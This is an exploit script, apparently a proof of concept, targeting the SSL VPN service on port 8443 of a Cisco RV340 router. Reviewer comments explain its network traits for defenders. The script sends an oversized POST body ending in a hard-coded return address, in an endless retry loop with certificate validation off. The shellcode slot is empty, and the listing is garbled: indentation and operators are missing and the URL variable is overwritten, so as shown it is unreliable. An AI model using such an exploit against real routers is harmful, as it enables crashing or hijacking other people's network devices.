#!/usr/bin/python3
# @FlashbackPwn @offensive_con
# https://twitter.com/jifa/status/1489971006122909704#m
# it is not well checked
import sys
import requests
import urllib3
import time
import socket
# Silences urllib3's InsecureRequestWarning for the whole process. The POST
# further down passes verify=False, so with this call in place nothing on the
# console indicates that the server certificate is never validated.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
def usage():
    """Print the one-line invocation hint and terminate with exit status -1."""
    hint = "./flashback_connects.py <TARGET>"
    print(hint)
    # sys.exit(-1) is exactly a SystemExit carrying -1; raised directly here.
    raise SystemExit(-1)
# Script body: takes one command-line argument (the target host), checks that
# TCP port 8443 accepts a connection, then repeatedly POSTs an oversized body
# to that port over HTTPS.
#
# NOTE(review): this listing lost its indentation and some punctuation when the
# page was extracted, so it is not valid Python as shown. It is documented
# as-is rather than reconstructed; the comments below describe only what the
# visible lines state.
#
# NOTE(review): no advisory id, affected firmware range or fixed version
# appears on this page. Anyone triaging exposure should take those from the
# vendor's advisory for the device named in the banner below.

# Exactly one argument is required; anything else prints the usage line and exits.
if len(sys.argv) != 2:
usage()
print("[x] Flashback_connects")
print("[*] Launching attack against Cisco RV340 WAN")
print("")
# The shellcode is an empty byte string in this listing; no executable payload
# is shipped with the page.
shellcode = b''
# The target host is used verbatim: it is not validated before being placed in
# the URL and passed to the socket call.
TARGET = sys.argv[1]
# Filler sized relative to 16400 bytes. For defenders: a request body of
# roughly that size sent to the SSL VPN port is the visible network trait of
# this script.
FILLER = shellcode b'x05' * (16400-(len(shellcode)))
#sc?### 0x704aed98
# A single hard-coded 32-bit address (see the author's comment above).
# presumably specific to one firmware build — not confirmed on this page.
PC = b'x98xedx4ax70'
url = 'https://%s:8443/X' % TARGET
url = 'X' * (len(TARGET)-7)
payload = FILLER PC
# Plain TCP reachability probe of port 8443; no TLS handshake is performed here.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect_ex returns 0 on success and an errno value otherwise (no exception).
result = sock.connect_ex((TARGET, 8443))
if result == 0:
print("[*] SSLVPND is up, ready to go!")
else:
print("[!] SSLVPND is down. Check configuration and try again")
sys.exit(-1)
sock.close()
# Unbounded loop: there is no break, no success check and no attempt limit, so
# the POST repeats until the process is killed. The response object `r` is
# never inspected.
while(True):
try:
print("[*] Attempt!")
# verify=False disables certificate validation, and no timeout is passed, so a
# stalled connection can block this call indefinitely.
r = requests.post(url, data=payload, verify=False)
# Only ConnectionError is handled; any other requests exception ends the script
# with a traceback. A service that stops accepting connections after a large
# POST to 8443, followed by retries at 10-second intervals, is the pattern a
# monitoring rule could key on.
except requests.exceptions.ConnectionError as e:
print("[!] Service not available. Sleeping")
time.sleep(10)